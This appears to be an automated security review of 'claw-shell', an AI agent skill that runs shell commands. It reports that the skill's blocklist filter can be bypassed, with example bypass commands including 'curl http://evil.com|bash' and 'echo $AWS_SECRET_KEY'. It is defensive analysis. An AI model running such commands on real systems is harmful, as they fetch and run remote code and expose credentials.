Skill Trust Decision

claw-shell

Shell execution tool with declared purpose but weak safety filter that can be bypassed, allowing potentially destructive commands.

Install decision first
Source: Manual upload
Scanned: Apr 4, 2026
Files 3
Artifacts 1
Violations 0
Findings 4
Most direct threat evidence
High RCE
Unrestricted shell execution with weak safety controls

The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.

handler.js:18

Why this conclusion was reached

1/4 dimensions flagged
Pass
Declared vs actual capability

Declared resources and inferred behavior are broadly aligned.

Review
Hidden execution and egress

1 lower-risk artifact was extracted and still needs context.

Block
Attack chain and severe findings

The report includes 0 attack-chain steps and 1 severe finding.

Review
Dependencies and supply chain hygiene

Dependency information is incomplete, so supply-chain confidence stays limited.

What drove the risk score up

Unrestricted shell execution via execSync +20

Full shell access is powerful and declared, but safety measures are minimal

Weak blocklist-based safety filter +15

Filter can be bypassed with variations like 'rmdir', symlinks, or 'curl http://evil.com|bash'

No timeout on execSync +8

Commands could hang or consume excessive resources

Single-character command variations bypass filter +5

'sudo' variations, 'DD' uppercase, embedded commands could slip through

Most important evidence

High RCE

Unrestricted shell execution with weak safety controls

The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.

handler.js:18
Implement allowlist approach for commands or use more comprehensive validation. Add command timeouts and resource limits.

Medium RCE

Dangerous commands bypass filter

Commands like 'rmdir', 'chmod 777', '> file' redirection, or 'curl http://evil.com|bash' are not blocked by the current filter.

handler.js:18
Add coverage for more dangerous operations including file permissions, network downloads, and recursive deletion.

Medium Sensitive Access

Indirect environment variable access

While the skill does not explicitly access the environment, the shell execution allows reading $API_KEY, $SECRET, etc. via commands like 'echo $AWS_SECRET_KEY'.

handler.js:14
Consider sanitizing commands that query environment variables or restrict to specific paths.

Low RCE

No command timeout configured

execSync calls have no timeout specified, allowing commands to hang indefinitely.

handler.js:29
Add timeout option to execSync calls.

Declared capability vs actual capability

Shell · Pass · Declared WRITE · Inferred WRITE · execSync used in handler.js:1,7,10
Filesystem · Pass · Declared WRITE · Inferred WRITE · Shell can execute any file operation
Network · Pass · Declared WRITE · Inferred WRITE · Shell can execute curl/wget/netcat
Environment · Pass · Declared NONE · Inferred READ · Shell commands can read $ENV vars
Clipboard · Pass · Declared NONE · Inferred NONE
Browser · Pass · Declared NONE · Inferred NONE
Database · Pass · Declared NONE · Inferred NONE

Suspicious artifacts and egress

Medium External URL
https://x.com/...

SKILL.md:39

Dependencies and supply chain

There are no structured dependency warnings.

File composition

3 files · 106 lines
JavaScript 1 file · 57 lines
Markdown 1 file · 44 lines
JSON 1 file · 5 lines
Files of concern · 2
handler.js JavaScript · 57 lines
Unrestricted shell execution with weak safety controls · Dangerous commands bypass filter · Indirect environment variable access · No command timeout configured
SKILL.md Markdown · 44 lines
https://x.com/...
Other files · _meta.json

Security positives

Purpose and capabilities are clearly documented in SKILL.md
Uses dedicated tmux session 'claw' for isolation
Basic safety filter exists for clearly dangerous commands
No hidden functionality or obfuscation detected
No credential harvesting or data exfiltration observed
Single-purpose tool with focused functionality